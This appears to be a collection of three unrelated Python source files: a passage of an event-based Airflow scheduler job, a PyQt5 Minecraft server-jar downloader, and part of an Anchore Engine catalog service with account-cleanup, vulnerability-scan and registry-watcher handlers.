dag_id=ti.dag_id,
execution_date=ti.execution_date,
try_number=ti.try_number,
action=SchedulingAction(message.action)
).to_event())
self.notification_client.send_event(ResponseEvent(event.request_id, dagrun.run_id).to_event())
elif message.message_type == UserDefineMessageType.STOP_SCHEDULING_TASK:
self._process_scheduling_job_request(event, message, False, session)
elif message.message_type == UserDefineMessageType.RESUME_SCHEDULING_TASK:
self._process_scheduling_job_request(event, message, True, session)
except Exception as e:
self.log.exception("Error occurred when processing request event.")
self.notification_client.send_event(ResponseEvent(event.request_id, str(e), Status.ERROR).to_event())
def _process_scheduling_job_request(self, event, message, is_schedulable, session):
dagrun = DagRun.get_run_by_id(session=session, dag_id=message.dag_id, run_id=message.dagrun_id)
ti: TI = dagrun.get_task_instance(task_id=message.task_id)
ti.is_schedulable = is_schedulable
session.merge(ti)
session.commit()
self.notification_client.send_event(ResponseEvent(event.request_id, ti.task_id).to_event())
def _stop_dag(self, dag_id, session: Session):
"""
Stop the dag. Pause the dag and cancel all running dag_runs and task_instances.
"""
DagModel.get_dagmodel(dag_id, session) \
.set_is_paused(is_paused=True, including_subdags=True, session=session)
active_runs = DagRun.find(dag_id=dag_id, state=State.RUNNING)
for dag_run in active_runs:
self._stop_dag_run(dag_run)
def _stop_dag_run(self, dag_run: DagRun):
dag_run.stop_dag_run()
self._stop_scheduling_periodic_tasks(dag_id=dag_run.dag_id, execution_date=dag_run.execution_date)
for ti in dag_run.get_task_instances():
if ti.state in State.unfinished:
self.executor.schedule_task(ti.key, SchedulingAction.STOP)
self.mailbox.send_message(DagRunFinishedEvent(dag_id=dag_run.dag_id,
execution_date=dag_run.execution_date).to_event())
class SchedulerEventWatcher(EventWatcher):
def __init__(self, mailbox):
self.mailbox = mailbox
def process(self, events: List[BaseEvent]):
for e in events:
self.mailbox.send_message(e)
class EventBasedSchedulerJob(BaseJob):
"""
1. todo self heartbeat
"""
__mapper_args__ = {'polymorphic_identity': 'EventBasedSchedulerJob'}
def __init__(self, dag_directory,
notification_server_uri=None,
event_start_time=None,
max_runs=-1,
refresh_dag_dir_interval=conf.getint('scheduler', 'refresh_dag_dir_interval', fallback=1),
*args, **kwargs):
super().__init__(*args, **kwargs)
if notification_server_uri is None:
notification_server_uri = conf.get('scheduler', 'notification_server_uri', fallback='127.0.0.1:50052')
self.log.info("Starting event based scheduler with notification server uri: {} dag dir: {}"
.format(notification_server_uri, dag_directory))
self.mailbox: Mailbox = Mailbox()
self.dag_trigger: DagTrigger = DagTrigger(
dag_directory=dag_directory,
max_runs=max_runs,
dag_ids=None,
pickle_dags=False,
mailbox=self.mailbox,
refresh_dag_dir_interval=refresh_dag_dir_interval,
notification_server_uri=notification_server_uri
)
self.task_event_manager = DagRunEventManager(self.mailbox)
self.executor.set_mailbox(self.mailbox)
self.executor.set_notification_server_uri(notification_server_uri)
self.notification_client: NotificationClient = NotificationClient(server_uri=notification_server_uri,
default_namespace=SCHEDULER_NAMESPACE)
self.periodic_manager = PeriodicManager(self.mailbox)
self.scheduler: EventBasedScheduler = EventBasedScheduler(
self.id,
self.mailbox,
self.task_event_manager,
self.executor,
self.notification_client,
notification_server_uri,
None,
self.periodic_manager
)
self.last_scheduling_id = self._last_scheduler_job_id()
self.need_recover_state = False
self.last_event_version = None
if event_start_time is None:
if self.last_scheduling_id is None:
self.start_time = int(time.time() * 1000)
else:
# need recover the state of the scheduler
self.start_time, self.last_event_version = self._get_progress(self.last_scheduling_id)
self.need_recover_state = True
else:
self.start_time = event_start_time
self.log.info('Progress {} {}'.format(self.start_time, self.last_event_version))
@staticmethod
def _last_scheduler_job_id():
last_run = EventBasedSchedulerJob.most_recent_job()
if not last_run:
return None
else:
return last_run.id
@staticmethod
def _get_progress(scheduling_job_id):
progress = get_event_progress(scheduling_job_id)
if progress is None:
return int(time.time() * 1000), None
else:
return progress.last_event_time, progress.last_event_version
def _execute(self):
# faulthandler.enable()
self.log.info("Starting the scheduler Job")
# DAGs can be pickled for easier remote execution by some executors
# pickle_dags = self.do_pickle and self.executor_class not in UNPICKLEABLE_EXECUTORS
try:
self.mailbox.set_scheduling_job_id(self.id)
self.mailbox.start()
self.scheduler.id = self.id
self.dag_trigger.start()
self.task_event_manager.start()
self.executor.job_id = self.id
self.periodic_manager.start()
self.register_signals()
# Start after resetting orphaned tasks to avoid stressing out DB.
execute_start_time = timezone.utcnow()
self.scheduler.submit_sync_thread()
if self.need_recover_state:
self.scheduler.recover(self.last_scheduling_id)
self._set_event_progress()
self._start_listen_events()
self.executor.start()
self._run_scheduler_loop()
self._stop_listen_events()
self.periodic_manager.shutdown()
self.dag_trigger.end()
self.task_event_manager.end()
self.executor.end()
self.mailbox.stop()
settings.Session.remove() # type: ignore
except Exception as e: # pylint: disable=broad-except
self.log.exception("Exception when executing scheduler, %s", e)
finally:
self.log.info("Exited execute loop")
def _run_scheduler_loop(self) -> None:
self.log.info("Starting the scheduler loop.")
self.scheduler.restore_unfinished_dag_run()
should_continue = True
while should_continue:
try:
should_continue = self.scheduler.schedule()
self.heartbeat(only_if_necessary=True)
except Exception as e:
traceback.print_exc()
self.log.error('Scheduler error [%s]', traceback.format_exc())
time.sleep(1)
self.scheduler.stop_timer()
def _set_event_progress(self):
create_or_update_progress(scheduling_job_id=self.id,
last_event_time=self.start_time,
last_event_version=self.last_event_version)
def _start_listen_events(self):
watcher = SchedulerEventWatcher(self.mailbox)
self.notification_client.start_listen_events(
watcher=watcher,
start_time=self.start_time,
version=self.last_event_version
)
self.log.info("start listen event from time: {} version: {}".format(self.start_time, self.last_event_version))
def _stop_listen_events(self):
self.notification_client.stop_listen_events()
def register_signals(self) -> None:
"""Register signals that stop child processes"""
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
signal.signal(signal.SIGUSR2, self._debug_dump)
def _exit_gracefully(self, signum, frame) -> None: # pylint: disable=unused-argument
"""Helper method to clean up processor_agent to avoid leaving orphan processes."""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
sys.exit(os.EX_OK)
def _debug_dump(self, signum, frame): # pylint: disable=unused-argument
try:
sig_name = signal.Signals(signum).name # pylint: disable=no-member
except Exception: # pylint: disable=broad-except
sig_name = str(signum)
self.log.info("%s\n%s received, printing debug\n%s", "-" * 80, sig_name, "-" * 80)
self.executor.debug_dump()
self.log.info("-" * 80)
def is_alive(self, grace_multiplier: Optional[float] = None) -> bool:
"""
Is this SchedulerJob alive?
We define alive as in a state of running and a heartbeat within the
threshold defined in the ``scheduler_health_check_threshold`` config
setting.
``grace_multiplier`` is accepted for compatibility with the parent class.
:rtype: boolean
"""
if grace_multiplier is not None:
# Accept the same behaviour as superclass
return super().is_alive(grace_multiplier=grace_multiplier)
scheduler_health_check_threshold: int = conf.getint('scheduler', 'scheduler_health_check_threshold')
return (
self.state == State.RUNNING
and (timezone.utcnow() - self.latest_heartbeat).total_seconds() < scheduler_health_check_threshold
)
|
Web.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import PyQt5
from PyQt5 import QtCore
from PyQt5.QtCore import QUrl
from PyQt5.QtWebEngineWidgets import QWebEngineView
import PyQt5.QtWidgets
import sys
import os
import urllib.request
#import threading
class Downloader(PyQt5.QtWidgets.QWidget):
def __init__(self) -> PyQt5.QtWidgets:
super().__init__()
self.browser()
def browser(self):
URL = 'https://www.minecraft.net/ja-jp/download/server/'
PyQt5.QtWebEngineWidgets.QWebEngineProfile.defaultProfile().downloadRequested.connect(
self.on_downloadRequested
)
self.browser = QWebEngineView()
self.browser.load(QUrl(URL))
self.browser.resize(800,600)
self.browser.move(200,200)
self.browser.setWindowTitle('Minecraft')
self.progressBar = PyQt5.QtWidgets.QProgressBar(self)
grid = PyQt5.QtWidgets.QGridLayout()
grid.addWidget(self.browser,2, 0, 5, 15)
grid.addWidget(self.progressBar)
self.setLayout(grid)
self.resize(1200, 800)
self.center()
self.setWindowTitle('Minecraft')
self.show()
def center(self):
''' centering widget
'''
qr = self.frameGeometry()
cp = PyQt5.QtWidgets.QDesktopWidget().availableGeometry().center()
qr.moveCenter(cp)
self.move(qr.topLeft())
@PyQt5.QtCore.pyqtSlot("QWebEngineDownloadItem*")
def on_downloadRequested(self,download):
self.old_path = download.url().path() # download.path()
#self.thread = threading.Thread(target=self.download)
#self.thread.setDaemon(True)
#self.thread.start()
#self.thread.join()
self.download()
def check(self, block_count, block_size, total_size):
percentage = 100.0 * block_count * block_size / total_size
self.progressBar.setValue(percentage)
PyQt5.QtWidgets.QApplication.processEvents()
def download(self):
if not os.path.isdir('./ServerData'):
os.mkdir('./ServerData')
if not os.path.isfile('./ServerData/server.jar'):
urllib.request.urlretrieve('https://launcher.mojang.com'+self.old_path,'./ServerData/server.jar',self.check) #'https://launcher.mojang.com'+self.old_path
#https://launcher.mojang.com/v1/objects/1b557e7b033b583cd9f66746b7a9ab1ec1673ced/server.jar
subwindow().show('ダウンロードが完了しました')
else:subwindow().show('すでにファイルがあります')
class subwindow(PyQt5.QtWidgets.QWidget):
text = '完了'
def __init__(self,parent = None):
super().__init__()
self.w = PyQt5.QtWidgets.QDialog(parent)
self.label = PyQt5.QtWidgets.QLabel()
self.label.setText(self.text)
button = PyQt5.QtWidgets.QPushButton('閉じる',self.w)
button.clicked.connect(sys.exit)
layout = PyQt5.QtWidgets.QHBoxLayout()
layout.addWidget(self.label)
layout.addWidget(button)
self.w.setLayout(layout)
def show(self,text):
self.label.setText = text
self.w.exec_()
def run():
app = PyQt5.QtWidgets.QApplication(sys.argv)
ex = Downloader()
sys.exit(app.exec_())
if __name__ == '__main__':
# mainPyQt5()
app = PyQt5.QtWidgets.QApplication(sys.argv)
# setWindowIcon is a method for QApplication, not for QWidget
ex = Downloader()
sys.exit(app.exec_())
|
__init__.py
|
import json
import os
import copy
import threading
import time
import pkg_resources
from sqlalchemy.exc import IntegrityError
# anchore modules
import anchore_engine.common.helpers
import anchore_engine.common.images
from anchore_engine.clients.services import internal_client_for
from anchore_engine.clients.services import simplequeue
from anchore_engine.clients.services.simplequeue import SimpleQueueClient
from anchore_engine.clients.services.policy_engine import PolicyEngineClient
import anchore_engine.configuration.localconfig
import anchore_engine.subsys.servicestatus
import anchore_engine.subsys.metrics
import anchore_engine.common
import anchore_engine.clients.services.common
from anchore_engine.clients import docker_registry
from anchore_engine import db
from anchore_engine.db import db_catalog_image, db_policybundle, db_queues, db_registries, db_subscriptions, \
db_accounts, db_anchore, db_services, db_events, AccountStates, AccountTypes, ArchiveTransitionRule
from anchore_engine.subsys import notifications, taskstate, logger, archive, object_store
from anchore_engine.services.catalog import catalog_impl
import anchore_engine.subsys.events as events
from anchore_engine.utils import AnchoreException
from anchore_engine.services.catalog.exceptions import TagManifestParseError, TagManifestNotFoundError, PolicyBundleValidationError
from anchore_engine.service import ApiService, LifeCycleStages
from anchore_engine.common.helpers import make_policy_record
from anchore_engine.subsys.identities import manager_factory
from anchore_engine.services.catalog import archiver
from anchore_engine.subsys.object_store.config import DEFAULT_OBJECT_STORE_MANAGER_ID, ANALYSIS_ARCHIVE_MANAGER_ID, ALT_OBJECT_STORE_CONFIG_KEY
##########################################################
# monitor section
def do_user_resources_delete(userId):
return_object = {}
httpcode = 500
resourcemaps = [
("subscriptions", db.db_subscriptions.get_all_byuserId, catalog_impl.do_subscription_delete),
("registries", db.db_registries.get_byuserId, catalog_impl.do_registry_delete),
("evaluations", db.db_policyeval.get_all_byuserId, catalog_impl.do_evaluation_delete),
("policybundles", db.db_policybundle.get_all_byuserId, catalog_impl.do_policy_delete),
("images", db.db_catalog_image.get_all_byuserId, catalog_impl.do_image_delete),
("archive", db.db_archivemetadata.list_all_byuserId, catalog_impl.do_archive_delete),
]
limit = 2048
all_total = 0
all_deleted = 0
for resourcename,getfunc,delfunc in resourcemaps:
try:
deleted = 0
total = 0
with db.session_scope() as dbsession:
records = getfunc(userId, session=dbsession, limit=limit)
total = len(records)
for record in records:
delfunc(userId, record, dbsession, force=True)
deleted = deleted + 1
return_object['total_{}'.format(resourcename)] = total
return_object['total_{}_deleted'.format(resourcename)] = deleted
all_total = all_total + total
all_deleted = all_deleted + deleted
if total or deleted:
logger.debug("deleted {} / {} {} records for user {}".format(deleted, total, resourcename, userId))
except Exception as err:
logger.warn("failed to delete resources in {} for user {}, will continue and try again - exception: {}".format(resourcename, userId, err))
return_object['all_total'] = all_total
return_object['all_deleted'] = all_deleted
httpcode = 200
return return_object, httpcode
def handle_account_resource_cleanup(*args, **kwargs):
watcher = str(kwargs['mythread']['taskType'])
handler_success = True
timer = time.time()
logger.debug("FIRING: " + str(watcher))
try:
# iterate over all deleted account records, and perform resource cleanup for that account. If there are no longer any resources associated with the account id, then finally delete the account record itself
with db.session_scope() as dbsession:
mgr = manager_factory.for_session(dbsession)
accounts = mgr.list_accounts(with_state=AccountStates.deleting, include_service=False)
for account in accounts:
userId = account['name']
logger.debug("Inspecting account {} for resource cleanup tasks".format(userId))
try:
return_object, httpcode = do_user_resources_delete(userId)
logger.debug("Resources for deleted account cleaned-up: {} - {}".format(return_object, httpcode))
if return_object.get('all_total', None) == 0 and return_object.get('all_deleted', None) == 0:
logger.debug("Resources for pending deleted user {} cleared - deleting account".format(userId))
with db.session_scope() as session:
mgr = manager_factory.for_session(session)
mgr.delete_account(userId)
else:
logger.debug("resources for pending deleted user {} not entirely cleared this cycle".format(userId))
except Exception as err:
raise Exception("failed to delete user {} resources - exception: {}".format(userId, err))
except Exception as err:
logger.warn("failure in handler - exception: " + str(err))
logger.debug("FIRING DONE: " + str(watcher))
try:
kwargs['mythread']['last_return'] = handler_success
except:
pass
if anchore_engine.subsys.metrics.is_enabled() and handler_success:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="success")
else:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="fail")
return True
def handle_vulnerability_scan(*args, **kwargs):
global feed_sync_updated
watcher = str(kwargs['mythread']['taskType'])
handler_success = True
timer = time.time()
logger.debug("FIRING: " + str(watcher))
try:
all_ready = anchore_engine.clients.services.common.check_services_ready(['policy_engine'])
if not all_ready:
logger.debug("FIRING DONE: feed syncer (skipping due to required services not being available)")
try:
kwargs['mythread']['last_return'] = False
except:
pass
return True
with db.session_scope() as dbsession:
mgr = manager_factory.for_session(dbsession)
accounts = mgr.list_accounts(with_state=AccountStates.enabled, include_service=False)
for account in accounts:
userId = account['name']
# vulnerability scans
doperform = False
vuln_subs = []
for subscription_type in ['vuln_update']:
dbfilter = {'subscription_type': subscription_type}
with db.session_scope() as dbsession:
subscription_records = db_subscriptions.get_byfilter(userId, session=dbsession, **dbfilter)
for subscription_record in subscription_records:
if subscription_record['active']:
image_info = anchore_engine.common.images.get_image_info(userId, "docker", subscription_record[
'subscription_key'], registry_lookup=False, registry_creds=(None, None))
dbfilter = {'registry': image_info['registry'], 'repo': image_info['repo'],
'tag': image_info['tag']}
if (dbfilter, subscription_record['subscription_value']) not in vuln_subs:
vuln_subs.append((dbfilter, subscription_record['subscription_value']))
for (dbfilter, value) in vuln_subs:
with db.session_scope() as dbsession:
image_records = db_catalog_image.get_byimagefilter(userId, 'docker', dbfilter=dbfilter,
onlylatest=False, session=dbsession)
if value:
try:
subscription_value = json.loads(value)
digests = set(subscription_value['digests'])
except Exception as err:
digests = set()
else:
digests = set()
# always add latest version of the image
if len(image_records) > 0:
digests.add(image_records[0]['imageDigest'])
current_imageDigest = image_records[0]['imageDigest']
for image_record in image_records:
if image_record['analysis_status'] == taskstate.complete_state('analyze'):
imageDigest = image_record['imageDigest']
if imageDigest not in digests:
continue
fulltag = dbfilter['registry'] + "/" + dbfilter['repo'] + ":" + dbfilter['tag']
doperform = True
if doperform:
logger.debug("calling vuln scan perform: " + str(fulltag) + " : " + str(imageDigest))
with db.session_scope() as dbsession:
try:
rc = catalog_impl.perform_vulnerability_scan(userId, imageDigest, dbsession, scantag=fulltag, force_refresh=False, is_current=(imageDigest==current_imageDigest))
except Exception as err:
logger.warn("vulnerability scan failed - exception: " + str(err))
except Exception as err:
logger.warn("failure in feed sync handler - exception: " + str(err))
logger.debug("FIRING DONE: " + str(watcher))
try:
kwargs['mythread']['last_return'] = handler_success
except:
pass
if anchore_engine.subsys.metrics.is_enabled() and handler_success:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="success")
else:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="fail")
return True
def handle_service_watcher(*args, **kwargs):
# global latest_service_records
cycle_timer = kwargs['mythread']['cycle_timer']
max_service_heartbeat_timer = 300
max_service_orphaned_timer = 3600
max_service_cleanup_timer = 86400
while True:
logger.debug("FIRING: service watcher")
localconfig = anchore_engine.configuration.localconfig.get_config()
verify = localconfig['internal_ssl_verify']
with db.session_scope() as dbsession:
mgr = manager_factory.for_session(dbsession)
event_account = anchore_engine.configuration.localconfig.ADMIN_ACCOUNT_NAME
anchore_services = db_services.get_all(session=dbsession)
# update the global latest service record dict in services.common
# latest_service_records.update({"service_records": copy.deepcopy(anchore_services)})
# fields to update each tick:
#
# heartbeat (current time)
# status (true/false)
# status_message (state of service)
# short_description(api return)
#
for service in anchore_services:
event = None
service_update_record = {}
if service['servicename'] == 'catalog' and service['hostid'] == localconfig['host_id']:
status = anchore_engine.subsys.servicestatus.get_status(service)
service_update_record.update({'heartbeat': int(time.time()), 'status': True,
'status_message': taskstate.complete_state('service_status'),
'short_description': json.dumps(status)})
else:
try:
try:
status = json.loads(service['short_description'])
except:
status = {'up': False, 'available': False}
# set to down until the response can be parsed
service_update_record['status'] = False
service_update_record['status_message'] = taskstate.fault_state('service_status')
service_update_record['short_description'] = "could not get service status description"
try:
# NOTE: this is where any service-specific decisions based on the 'status' record could happen - now all services are the same
if status['up'] and status['available']:
if time.time() - service['heartbeat'] > max_service_heartbeat_timer:
logger.warn("no service heartbeat within allowed time period ({}) for service ({}/{}) - disabling service".format(max_service_heartbeat_timer, service['hostid'], service['servicename']))
service_update_record[
'short_description'] = "no heartbeat from service in ({}) seconds".format(
max_service_heartbeat_timer)
# Trigger an event to log the down service
event = events.ServiceDowned(user_id=event_account, name=service['servicename'],
host=service['hostid'],
url=service['base_url'],
cause='no heartbeat from service in ({}) seconds'.format(
max_service_heartbeat_timer))
else:
service_update_record['status'] = True
service_update_record['status_message'] = taskstate.complete_state('service_status')
try:
service_update_record['short_description'] = json.dumps(status)
except:
service_update_record['short_description'] = str(status)
else:
# handle the down state transitions
if time.time() - service['heartbeat'] > max_service_cleanup_timer:
# remove the service entirely
logger.warn("no service heartbeat within allowed time period ({}) for service ({}/{}) - removing service".format(max_service_cleanup_timer, service['hostid'], service['servicename']))
try:
# remove the service record from DB
removed_hostid = service['hostid']
removed_servicename = service['servicename']
removed_base_url = service['base_url']
db_services.delete(removed_hostid, removed_servicename, session=dbsession)
service_update_record = None
# Trigger an event to log the orphaned service, only on transition
event = events.ServiceRemoved(user_id=event_account, name=removed_servicename,
host=removed_hostid,
url=removed_base_url,
cause='no heartbeat from service in ({}) seconds'.format(
max_service_cleanup_timer))
except Exception as err:
logger.warn("attempt to remove service {}/{} failed - exception: {}".format(service.get('hostid'), service.get('servicename'), err))
elif time.time() - service['heartbeat'] > max_service_orphaned_timer:
# transition down service to orphaned
logger.warn("no service heartbeat within allowed time period ({}) for service ({}/{}) - orphaning service".format(max_service_orphaned_timer, service['hostid'], service['servicename']))
service_update_record['status'] = False
service_update_record['status_message'] = taskstate.orphaned_state('service_status')
service_update_record[
'short_description'] = "no heartbeat from service in ({}) seconds".format(
max_service_orphaned_timer)
if service['status_message'] != taskstate.orphaned_state('service_status'):
# Trigger an event to log the orphaned service, only on transition
event = events.ServiceOrphaned(user_id=event_account, name=service['servicename'],
host=service['hostid'],
url=service['base_url'],
cause='no heartbeat from service in ({}) seconds'.format(
max_service_orphaned_timer))
except Exception as err:
logger.warn(
"could not get/parse service status record for service: - exception: " + str(err))
except Exception as err:
logger.warn(
"could not get service status: " + str(service) + " : exception: " + str(err) + " : " + str(
err.__dict__))
if service_update_record:
service_update_record['status'] = False
service_update_record['status_message'] = taskstate.fault_state('service_status')
service_update_record['short_description'] = "could not get service status"
finally:
if event:
catalog_impl.add_event(event, dbsession)
if service_update_record:
service.update(service_update_record)
try:
db_services.update_record(service, session=dbsession)
except Exception as err:
logger.warn("could not update DB: " + str(err))
logger.debug("FIRING DONE: service watcher")
try:
kwargs['mythread']['last_return'] = True
except:
pass
time.sleep(cycle_timer)
return True
def handle_repo_watcher(*args, **kwargs):
global system_user_auth
watcher = str(kwargs['mythread']['taskType'])
handler_success = True
timer = time.time()
logger.debug("FIRING: " + str(watcher))
with db.session_scope() as dbsession:
mgr = manager_factory.for_session(dbsession)
accounts = mgr.list_accounts(with_state=AccountStates.enabled, include_service=False)
for account in accounts:
userId = account['name']
dbfilter = {}
with db.session_scope() as dbsession:
dbfilter['subscription_type'] = 'repo_update'
subscription_records = db_subscriptions.get_byfilter(userId, session=dbsession, **dbfilter)
registry_creds = db_registries.get_byuserId(userId, session=dbsession)
try:
catalog_impl.refresh_registry_creds(registry_creds, dbsession)
except Exception as err:
logger.warn("failed to refresh registry credentials - exception: " + str(err))
for subscription_record in subscription_records:
if not subscription_record['active']:
continue
event = None
try:
regrepo = subscription_record['subscription_key']
if subscription_record['subscription_value']:
subscription_value = json.loads(subscription_record['subscription_value'])
if 'autosubscribe' not in subscription_value:
subscription_value['autosubscribe'] = False
if 'lookuptag' not in subscription_value:
subscription_value['lookuptag'] = 'latest'
else:
subscription_value = {'autosubscribe': False, 'lookuptag': 'latest'}
stored_repotags = subscription_value.get('repotags', [])
fulltag = regrepo + ":" + subscription_value.get('lookuptag', 'latest')
image_info = anchore_engine.common.images.get_image_info(userId, "docker", fulltag,
registry_lookup=False,
registry_creds=(None, None))
# List tags
try:
curr_repotags = docker_registry.get_repo_tags(userId, image_info, registry_creds=registry_creds)
except AnchoreException as e:
event = events.ListTagsFailed(user_id=userId, registry=image_info.get('registry', None),
repository=image_info.get('repo', None), error=e.to_dict())
raise e
autosubscribes = ['analysis_update']
if subscription_value['autosubscribe']:
autosubscribes.append("tag_update")
repotags = set(curr_repotags).difference(set(stored_repotags))
if repotags:
logger.debug("new tags to watch in repo (" + str(regrepo) + "): " + str(repotags))
added_repotags = stored_repotags
for repotag in repotags:
try:
fulltag = image_info['registry'] + "/" + image_info['repo'] + ":" + repotag
logger.debug("found new tag in repo: " + str(fulltag))
try:
new_image_info = anchore_engine.common.images.get_image_info(userId, "docker", fulltag,
registry_lookup=True,
registry_creds=registry_creds)
except Exception as err:
event = events.ImageRegistryLookupFailed(user_id=userId, image_pull_string=fulltag, data=err.__dict__)
raise err
manifest = None
try:
if 'manifest' in new_image_info:
try:
manifest = json.dumps(new_image_info['manifest'])
except Exception as err:
raise TagManifestParseError(cause=err, tag=fulltag,
manifest=new_image_info['manifest'],
msg='Failed to serialize manifest into JSON formatted string')
else:
raise TagManifestNotFoundError(tag=fulltag, msg='No manifest from get_image_info')
except AnchoreException as e:
event = events.TagManifestParseFailed(user_id=userId, tag=fulltag, error=e.to_dict())
raise
with db.session_scope() as dbsession:
logger.debug("adding/updating image from repo scan " + str(new_image_info['fulltag']))
# add the image
image_records = catalog_impl.add_or_update_image(dbsession, userId,
new_image_info['imageId'],
tags=[new_image_info['fulltag']],
digests=[new_image_info['fulldigest']],
parentdigest=new_image_info.get('parentdigest', None),
manifest=manifest)
# add the subscription records with the configured default activations
for stype in anchore_engine.common.subscription_types:
activate = False
if stype == 'repo_update':
continue
elif stype in autosubscribes:
activate = True
db_subscriptions.add(userId, new_image_info['fulltag'], stype, {'active': activate},
session=dbsession)
added_repotags.append(repotag)
except Exception as err:
logger.warn(
"could not add discovered tag from repo (" + str(fulltag) + ") - exception: " + str(
err))
# update the subscription record with the latest successfully added image tags
with db.session_scope() as dbsession:
subscription_value['repotags'] = added_repotags
subscription_value['tagcount'] = len(added_repotags)
db_subscriptions.update(userId, regrepo, 'repo_update',
{'subscription_value': json.dumps(subscription_value)},
session=dbsession)
else:
logger.debug("no new images in watched repo (" + str(regrepo) + "): skipping")
except Exception as err:
logger.warn("failed to process repo_update subscription - exception: " + str(err))
finally:
if event:
with db.session_scope() as dbsession:
catalog_impl.add_event(event, dbsession)
logger.debug("FIRING DONE: " + str(watcher))
try:
kwargs['mythread']['last_return'] = handler_success
except:
pass
if anchore_engine.subsys.metrics.is_enabled() and handler_success:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="success")
else:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="fail")
return True
def handle_image_watcher(*args, **kwargs):
global system_user_auth
watcher = str(kwargs['mythread']['taskType'])
handler_success = True
timer = time.time()
logger.debug("FIRING: " + str(watcher))
obj_mgr = object_store.get_manager()
with db.session_scope() as dbsession:
mgr = manager_factory.for_session(dbsession)
accounts = mgr.list_accounts(with_state=AccountStates.enabled, include_service=False)
for account in accounts:
userId = account['name']
if account['type'] == AccountTypes.service: # userId == 'anchore-system':
continue
with db.session_scope() as dbsession:
dbfilter = {}
dbfilter['subscription_type'] = 'tag_update'
subscription_records = db_subscriptions.get_byfilter(userId, session=dbsession, **dbfilter)
registry_creds = db_registries.get_byuserId(userId, session=dbsession)
try:
catalog_impl.refresh_registry_creds(registry_creds, dbsession)
except Exception as err:
logger.warn("failed to refresh registry credentials - exception: " + str(err))
alltags = []
for subscription_record in subscription_records:
if not subscription_record['active']:
continue
try:
fulltag = subscription_record['subscription_key']
if fulltag not in alltags:
alltags.append(fulltag)
except Exception as err:
logger.warn("problem creating taglist for image watcher - exception: " + str(err))
for registry_record in registry_creds:
try:
registry_status = docker_registry.ping_docker_registry(registry_record)
except Exception as err:
registry_record['record_state_key'] = 'auth_failure'
registry_record['record_state_val'] = str(int(time.time()))
logger.warn("registry ping failed - exception: " + str(err))
logger.debug("checking tags for update: " + str(userId) + " : " + str(alltags))
for fulltag in alltags:
event = None
try:
logger.debug("checking image latest info from registry: " + fulltag)
try:
image_info = anchore_engine.common.images.get_image_info(userId, "docker", fulltag,
registry_lookup=True,
registry_creds=registry_creds)
except Exception as err:
event = events.ImageRegistryLookupFailed(user_id=userId, image_pull_string=fulltag, data=err.__dict__)
raise err
logger.spew("checking image: got registry info: " + str(image_info))
manifest = None
try:
if 'manifest' in image_info:
try:
manifest = json.dumps(image_info['manifest'])
except Exception as err:
raise TagManifestParseError(cause=err, tag=fulltag, manifest=image_info['manifest'],
msg='Failed to serialize manifest into JSON formatted string')
else:
raise TagManifestNotFoundError(tag=fulltag, msg='No manifest from get_image_info')
except AnchoreException as e:
event = events.TagManifestParseFailed(user_id=userId, tag=fulltag, error=e.to_dict())
raise
parent_manifest = json.dumps(image_info.get('parentmanifest', {}))
try:
dbfilter = {
'registry': image_info['registry'],
'repo': image_info['repo'],
'tag': image_info['tag'],
'digest': image_info['digest']
}
except Exception as err:
raise Exception("could not prepare db filter for complete lookup check - exception: " + str(err))
try:
stored_manifest = json.loads(obj_mgr.get_document(userId, 'manifest_data', image_info['digest']))
if not stored_manifest:
raise Exception("stored manifest is empty")
except Exception as err:
logger.debug("found empty/invalid stored manifest, storing new: " + str(err))
rc = obj_mgr.put_document(userId, 'manifest_data', image_info['digest'], manifest)
try:
stored_parent_manifest = json.loads(obj_mgr.get_document(userId, 'parent_manifest_data', image_info['digest']))
if not stored_parent_manifest:
raise Exception("stored parent manifest is empty")
except Exception as err:
logger.debug("found empty/invalid stored parent manifest, storing new: " + str(err))
rc = obj_mgr.put_document(userId, 'parent_manifest_data', image_info['digest'], parent_manifest)
logger.debug("checking image: looking up image in db using dbfilter: " + str(dbfilter))
with db.session_scope() as dbsession:
record = db_catalog_image.get_byimagefilter(userId, 'docker', dbfilter, session=dbsession)
if record:
logger.debug("checking image: found match, no update, nothing to do: " + str(fulltag))
else:
logger.info(
"checking image: found latest digest for tag is not in DB: should update and queue for analysis: tag=" + str(
fulltag) + " latest_digest=" + str(dbfilter['digest']))
# get the set of existing digests
try:
last_dbfilter = {}
last_dbfilter.update(dbfilter)
last_dbfilter.pop('digest', None)
last_digests = []
last_annotations = {}
is_latest = True
with db.session_scope() as dbsession:
last_image_records = db_catalog_image.get_byimagefilter(userId, 'docker', last_dbfilter,
session=dbsession)
if last_image_records:
for last_image_record in last_image_records:
imageDigest = last_image_record['imageDigest']
for image_detail in last_image_record['image_detail']:
last_digests.append(image_detail['digest'])
# only do this (bring forward annotations) for the first found digest (last digest associated with tag)
if is_latest:
if not last_annotations and last_image_record['annotations']:
try:
if last_image_record.get('annotations', '{}'):
last_annotations.update(
json.loads(last_image_record.get('annotations', '{}')))
except:
pass
is_latest = False
except Exception as err:
logger.error(str(err))
# add and store the new image
with db.session_scope() as dbsession:
logger.debug("adding new image from tag watcher " + str(image_info))
image_records = catalog_impl.add_or_update_image(dbsession, userId, image_info['imageId'],
tags=[image_info['fulltag']],
digests=[image_info['fulldigest']],
parentdigest=image_info.get('parentdigest', None),
manifest=manifest,
parent_manifest=parent_manifest,
annotations=last_annotations)
if image_records:
image_record = image_records[0]
else:
image_record = {}
logger.info("checking image: added new image: " + str(image_record))
new_digests = [image_info['digest']]
# construct the notification and queue
try:
npayload = {
'last_eval': last_digests,
'curr_eval': new_digests,
}
if last_annotations:
npayload['annotations'] = last_annotations
rc = notifications.queue_notification(userId, fulltag, 'tag_update', npayload)
logger.debug("queued image tag update notification: " + fulltag)
# inobj = {
# 'userId': userId,
# 'subscription_key':fulltag,
